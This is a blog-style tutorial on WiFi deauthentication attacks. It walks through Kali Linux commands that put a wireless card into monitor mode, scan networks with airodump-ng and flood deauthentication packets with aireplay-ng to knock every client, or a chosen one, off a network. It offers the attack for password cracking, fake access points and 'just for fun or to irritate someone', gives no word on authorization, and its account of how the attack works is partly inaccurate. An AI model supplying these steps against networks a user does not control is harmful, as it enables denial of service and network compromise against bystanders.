In this article, I will explain a very useful attack lies under pre-connection wireless attacks category, which is known as WIFI Deauthentication attack, it is also known as WIFI deauth attack.
What is WiFi Deauthentication Attack?
WiFi Deauthentication Attack allows us to disconnect any device from any network, without connecting to that network and even without knowing the password of that network. It is a kind of ‘Denial-of-service’ attack, which is used to disconnect the devices connected to a WiFi network by continuously sending data packets or disassociate beacons to that Access Point. The attack targets the communication between the clients or users and the Access Point they are connected with.
Working of WiFi Deauthentication Attack
In this attack the attacker pretends to be client which is to be disconnected from the network by changing the MAC address to the client’s MAC address. And then sends some special deauthentication packets to the client as a spoofed Access Point and say that “you are not a authenticated user,validate yourself”. The process revokes the connection between the router and the client. After all of that, the Access Point and the user realize that they need to authenticate again. Now as the client has the key/password saved in the to-be-validated packet, attackers can capture that and later on they can decrypt that to compromise the network.
Denial Of Service Attack or DOS Attack
Denial Of Service Attack is a kind of cyber attack in which the aim of attacker is to make a system or resource unavailable to its users by allocating all the resources to himself. We can perform this attack by flooding the tons of requests which that resource will not able to handle. So its resources will get overloaded which will make the system or its services disable or unavailable for some time.
But, why to use deauthenticate?
It could be use in following cases:
1. Cracking Wi-Fi password
2. In case of Fake Access Point Attack
3. In information gathering to perform other greater attacks
4. To disconnect fake users
5. Just for fun or to Irritate someone.
How to deauthenticate devices in a Wi-Fi network?
To perform a deauthentication attack following are prerequisite
A system having Kali Linux
WiFi card which supports monitor mode
You can check this tutorial to install Kali Linux on virtual box: How to Install Kali Linux in Virtual box
How to perform wifi deauthentication attack.
There are number of tools available like ip manager, aireplay-ng etc. to perform this attack. For this tutorial I am going to use aireplay-ng, because it is very simple to use.
Following are the steps to perform deauthentication attack on wifi.
- First of all open up the terminal and put your Network Interface Card into monitor mode by typing the following commands one by one.
sudo ifconfig (interface name) down. In this case it is sudo ifconfig wlan0 down
sudo iwconfig (interface name) mode monitor. In this case it is sudo iwconfig wlan0 mode monitor
sudo ifconfig (interface name) up. In this case it is sudo ifconfig wlan0 up
- Now it will start scanning for the available networks by typing sudo airodump-ng <network interface name>. In this case it is sudo airodump-ng wlan0. Now, Wait until you find your target network and then press CTRL+C to stop the scanning.
- After that we need to monitor our target network specifically.
To do the same type
sudo airodump-ng -c (CH number) –bssid (BSSID of the network) (Network interface card). In this case it will be: sudo airodump-ng -c 3 –bssid EC:B3:13:C6:75:49 wlan0
- If you want to deauthenticate all the devices in WiFi network
Type: sudo aireplay-ng -0 0 -a (BSSID of the targeted network) (Network interface name)
In this case it will be aireplay-ng -0 0 -a EC:B3:13:C6:75:49 wlan0
If you want to deauthenticate specific client in a network
Type: sudo aireplay-ng -0 0 -a (MAC Address of the targeted network) -c (MAC Address of thethe device you want to deauthenticate) (Name of the interface)
Description of the command:
aireplay-ng is the name of the tool to perform de-authentication.
-0 is to tell tool to create the de-authentication packets
0 will send infinite number of de-authentication packets. You can also use small numbers of packets like 10 or 20 which is suitable for your case.
-a XX:XX:XX:XX:XX:XX specifies the router or access point
-c XX:XX:XX:XX:XX:XX points mac address of the client which we want to disconnect from the network.
wlan(x) is your Network interface card in monitor mode.
You can check Official repository for aircrack-ng suit here: aircrack-ng.
This is all about WiFi Deauthentication Attack using Kali Linux. Hope you learn something new with this tutorial. If you have any query or suggestion please mention that in comment box.